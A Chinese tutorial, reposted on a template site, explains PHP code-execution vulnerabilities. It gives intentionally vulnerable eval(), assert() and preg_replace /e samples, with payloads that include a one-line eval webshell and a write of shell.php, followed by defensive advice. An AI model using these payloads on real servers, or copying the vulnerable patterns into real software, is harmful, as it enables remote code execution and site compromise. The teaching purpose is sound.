代码执行漏洞

这篇具有很好参考价值的文章主要介绍了代码执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、代码执行漏洞:

1、漏洞简述:

        当应用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。

2、代码执行常见函数:

(1)PHP:

1、eval():把一些字符串当作代码来执行
2、assert():执行一些函数
3、preg_replace()

(2)JAVA:

没有类似的函数,但是一些引擎可以达成相同的效果

二、实例:

1、对于 assert() 函数:

(1)实例源码:

<?php
	function funtest1(){
		echo '这是一个页面';
	}
	
	$_GET['a']($_GET['b']);
?>

 (2)payload:

?a=assert&b=phpinfo()
2、对于 eval() 函数:

(1)实例源码:

<?php
	if(isset($_GET['cc'])){
		@eval($_GET['cc']);
	}else{
		echo "请传入参数!";
	}
?>

(2)payload:

?cc=echo chunchun;
?cc=phpinfo();
?cc=@eval($_POST['cmd']);

有时候需要先执行正确的语句,这时候应该设置为:
?cc=echo 1;@eval($_POST['cmd']);

?cc=fputs(fopen("shell.php","a"),"<?php phpinfo();?>");
3、对于 preg_replace() 函数:

实例1:

(1)源码:

<?php
    function complexStrtolower($regex, $value)
    {
        return preg_replace('/(' . $regex . ')/ie', 'strtolower("\\1")', $value);
    }
    foreach ($_GET as $regex => $value) {
        complexStrtolower($regex, $value);
    }
?>

(2)payload:

?\S*={${phpinfo()}}

实例2:

(1)源码:

<?php
	$value = $_GET['cc'];
	preg_replace('/(\S*)/ie', "\\1", $value);
?>

(2)payload:

?cc=phpinfo()

实例3:

(1)源码:

<?php
$data = $_GET['data'];
preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";',$data);
?>

(2)payload:

?data=<data>{${phpinfo()}}</data>

三、漏洞防御:

1、使用 json 保存数组;

2、对于必须使用 eval 的地方,一定严格处理用户数据(白名单、黑名单);

3、字符串使用单引号包括可控代码,插入前使用 addslashes 转义(addslashes、魔术引号、 htmlspecialchars、 htmlentities、mysql_real_escape_string) ;

4、放弃使用 preg_replace 的 e 修饰符,使用 preg_replace_callback()替换;

5、若必须使用 preg_replace 的 e 修饰符,则必用单引号包裹正则匹配出的对象;文章来源地址https://www.toymoban.com/news/detail-717078.html

到了这里,关于代码执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 漏洞复现 CVE-2023-0297( pyload远程代码执行漏洞 )

    在 addcrypted2() 函数中,对传入的参数 jk 解析后用 eval_js() 作为 JS 语句执行。 利用 JS 中 pyimport 导入 OS 包,执行系统命令(文件操作,进程管理),还可以利用 os.system() 执行 shell 命令。 构建 payload 过程比较简单,只要传入所需的 package, crypted, jk, passwords 四个参数即可,这里

    2024年02月08日
    浏览(39)
  • 漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,紧随账号

    2024年02月16日
    浏览(54)
  • iwebsec靶场 命令执行漏洞通关笔记

    iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、绕过、通配符绕过、base64绕过共五方面的渗透。 什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令

    2024年02月10日
    浏览(44)
  • 远程代码执行漏洞的利用与防御

    全称:remote command/code execute 分为远程命令执行和远程代码执行 1.命令执行漏洞: 直接调用操作系统命令 2.代码执行漏洞: 靠执行脚本代码调用操作系统命令 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防

    2024年02月15日
    浏览(46)
  • RCE 远程代码执行漏洞分析

    Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 PHP 代码执行 PHP 代码注入 OS 命令执行 OS 命令注入 Java、Python…… Web 应用程序 远程服务 操作系统

    2024年02月08日
    浏览(40)
  • 微软远程桌面服务远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人、技术、管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口。在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当事件占比 3%, 与人和管理相关的事件合计占总数的 1/3,安全管理

    2024年02月13日
    浏览(37)
  • Http.sys远程代码执行漏洞复现

    Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的

    2023年04月26日
    浏览(56)
  • HTTP.sys远程代码执行漏洞修复

    Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的

    2024年02月02日
    浏览(47)
  • Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)漏洞复现

    本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。 该漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 I

    2024年02月06日
    浏览(50)
  • Apache ActiveMQ 远程代码执行漏洞分析

    Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞(CNVD-2023-69477  CVE-2023-46604),攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。 影响版本 ‍ 环境搭建 没有找到合适的 docker 镜像 ,尝试自己进行

    2024年02月03日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包